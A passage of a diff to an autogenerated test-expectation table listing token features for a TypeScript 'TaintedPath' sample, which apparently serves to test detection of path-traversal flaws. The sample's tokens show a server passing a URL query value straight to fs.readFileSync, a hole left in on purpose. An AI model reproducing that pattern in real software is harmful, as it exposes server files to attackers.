autogenerated/TaintedPath/typescript.ts:5:18:5:32 | require('path') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:5:18:5:32 | require('path') | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:5:26:5:31 | 'path' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/typescript.ts:5:26:5:31 | 'path' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:5:26:5:31 | 'path' | calleeImports | | | autogenerated/TaintedPath/typescript.ts:5:26:5:31 | 'path' | contextFunctionInterfaces | | | autogenerated/TaintedPath/typescript.ts:5:26:5:31 | 'path' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/typescript.ts:5:26:5:31 | 'path' | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:8:5:8:10 | server | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:8:5:8:10 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:8:5:8:10 | server | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:8:5:34:2 | server ... ted\\n\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:8:5:34:2 | server ... ted\\n\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:8:5:34:2 | server ... ted\\n\\n}) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:8:14:8:17 | http | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:8:14:8:17 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:8:14:8:17 | http | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:8:14:8:30 | http.createServer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:8:14:8:30 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:8:14:8:30 | http.createServer | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:8:14:34:2 | exceptional return of http.cr ... ted\\n\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:8:14:34:2 | exceptional return of http.cr ... ted\\n\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:8:14:34:2 | exceptional return of http.cr ... ted\\n\\n}) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:8:14:34:2 | http.cr ... ted\\n\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:8:14:34:2 | http.cr ... ted\\n\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:8:14:34:2 | http.cr ... ted\\n\\n}) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:8:19:8:30 | createServer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:8:19:8:30 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:8:19:8:30 | createServer | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:8:32:8:31 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:8:32:8:31 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:8:32:8:31 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:8:32:8:31 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:8:32:8:31 | fs | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:8:32:8:31 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:8:32:8:31 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:8:32:8:31 | this | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:8:32:8:31 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:8:32:8:31 | this | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:8:32:8:31 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:8:32:8:31 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:8:32:8:31 | url | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:8:32:8:31 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:8:32:8:31 | url | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:8:32:34:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:8:32:34:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:8:32:34:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:8:32:34:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:8:32:34:1 | 'arguments' object of anonymous function | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:8:32:34:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:8:32:34:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:8:32:34:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:8:32:34:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:8:32:34:1 | exceptional return of anonymous function | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:8:32:34:1 | functio ... nted\\n\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/TaintedPath/typescript.ts:8:32:34:1 | functio ... nted\\n\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:8:32:34:1 | functio ... nted\\n\\n} | calleeImports | http | @@ -11645,6 +88663,86 @@ tokenFeatures | autogenerated/TaintedPath/typescript.ts:8:32:34:1 | functio ... nted\\n\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/typescript.ts:8:32:34:1 | functio ... nted\\n\\n} | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:8:32:34:1 | functio ... nted\\n\\n} | receiverName | http | +| autogenerated/TaintedPath/typescript.ts:8:32:34:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:8:32:34:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:8:32:34:1 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:8:32:34:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:8:32:34:1 | return of anonymous function | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:8:41:8:43 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:8:41:8:43 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:8:41:8:43 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:8:41:8:43 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:8:41:8:43 | req | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:8:41:8:43 | req | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:8:41:8:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:8:41:8:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:8:41:8:43 | req | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:8:41:8:43 | req | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:8:46:8:48 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:8:46:8:48 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:8:46:8:48 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:8:46:8:48 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:8:46:8:48 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:8:46:8:48 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:8:46:8:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:8:46:8:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:8:46:8:48 | res | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:8:46:8:48 | res | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:9:7:9:10 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:9:7:9:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:9:7:9:10 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:9:7:9:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:9:7:9:10 | path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:9:7:9:48 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:9:7:9:48 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:9:7:9:48 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:9:7:9:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:9:7:9:48 | path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:9:7:9:48 | path = ... ry.path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:9:7:9:48 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:9:7:9:48 | path = ... ry.path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:9:7:9:48 | path = ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:9:7:9:48 | path = ... ry.path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:9:14:9:16 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:9:14:9:16 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:9:14:9:16 | url | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:9:14:9:16 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:9:14:9:16 | url | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:9:14:9:22 | url.parse | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:9:14:9:22 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:9:14:9:22 | url.parse | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:9:14:9:22 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:9:14:9:22 | url.parse | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:9:14:9:37 | exceptional return of url.par ... , true) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:9:14:9:37 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:9:14:9:37 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:9:14:9:37 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:9:14:9:37 | exceptional return of url.par ... , true) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:9:14:9:37 | url.par ... , true) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:9:14:9:37 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:9:14:9:37 | url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:9:14:9:37 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:9:14:9:37 | url.par ... , true) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:9:14:9:43 | url.par ... ).query | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:9:14:9:43 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:9:14:9:43 | url.par ... ).query | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:9:14:9:43 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:9:14:9:43 | url.par ... ).query | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:9:14:9:48 | url.par ... ry.path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:9:14:9:48 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:9:14:9:48 | url.par ... ry.path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:9:14:9:48 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:9:14:9:48 | url.par ... ry.path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:9:18:9:22 | parse | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:9:18:9:22 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:9:18:9:22 | parse | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:9:18:9:22 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:9:18:9:22 | parse | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:9:24:9:26 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:9:24:9:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:9:24:9:26 | req | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:9:24:9:26 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:9:24:9:26 | req | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:9:24:9:30 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/typescript.ts:9:24:9:30 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:9:24:9:30 | req.url | calleeImports | url | @@ -11654,6 +88752,11 @@ tokenFeatures | autogenerated/TaintedPath/typescript.ts:9:24:9:30 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/typescript.ts:9:24:9:30 | req.url | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:9:24:9:30 | req.url | receiverName | url | +| autogenerated/TaintedPath/typescript.ts:9:28:9:30 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:9:28:9:30 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:9:28:9:30 | url | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:9:28:9:30 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:9:28:9:30 | url | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:9:33:9:36 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/typescript.ts:9:33:9:36 | true | InputArgumentIndex | 1 | | autogenerated/TaintedPath/typescript.ts:9:33:9:36 | true | calleeImports | url | @@ -11663,6 +88766,56 @@ tokenFeatures | autogenerated/TaintedPath/typescript.ts:9:33:9:36 | true | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/typescript.ts:9:33:9:36 | true | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:9:33:9:36 | true | receiverName | url | +| autogenerated/TaintedPath/typescript.ts:9:39:9:43 | query | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:9:39:9:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:9:39:9:43 | query | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:9:39:9:43 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:9:39:9:43 | query | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:9:45:9:48 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:9:45:9:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:9:45:9:48 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:9:45:9:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:9:45:9:48 | path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:12:3:12:5 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:12:3:12:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:12:3:12:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:12:3:12:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:12:3:12:5 | res | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:12:3:12:11 | res.write | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:12:3:12:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:12:3:12:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:12:3:12:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:12:3:12:11 | res.write | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:12:3:12:34 | exceptional return of res.wri ... (path)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:12:3:12:34 | exceptional return of res.wri ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:12:3:12:34 | exceptional return of res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:12:3:12:34 | exceptional return of res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:12:3:12:34 | exceptional return of res.wri ... (path)) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:12:3:12:34 | res.wri ... (path)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:12:3:12:34 | res.wri ... (path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:12:3:12:34 | res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:12:3:12:34 | res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:12:3:12:34 | res.wri ... (path)) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:12:7:12:11 | write | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:12:7:12:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:12:7:12:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:12:7:12:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:12:7:12:11 | write | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:12:13:12:14 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:12:13:12:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:12:13:12:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:12:13:12:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:12:13:12:14 | fs | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:12:13:12:27 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:12:13:12:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:12:13:12:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:12:13:12:27 | fs.readFileSync | 